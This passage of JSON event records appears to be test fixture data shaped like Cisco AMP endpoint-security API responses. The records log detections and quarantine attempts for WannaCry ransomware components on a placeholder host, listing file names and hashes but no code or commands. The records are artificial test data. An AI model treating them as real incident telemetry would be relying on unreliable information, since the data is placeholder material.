pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":580000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303569945526290","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d","sha1":"be5d6279874da315e3080b06083757aad9b32c23","md5":"8495400f199ac77853c53b5a3f278f3e"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":564000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat 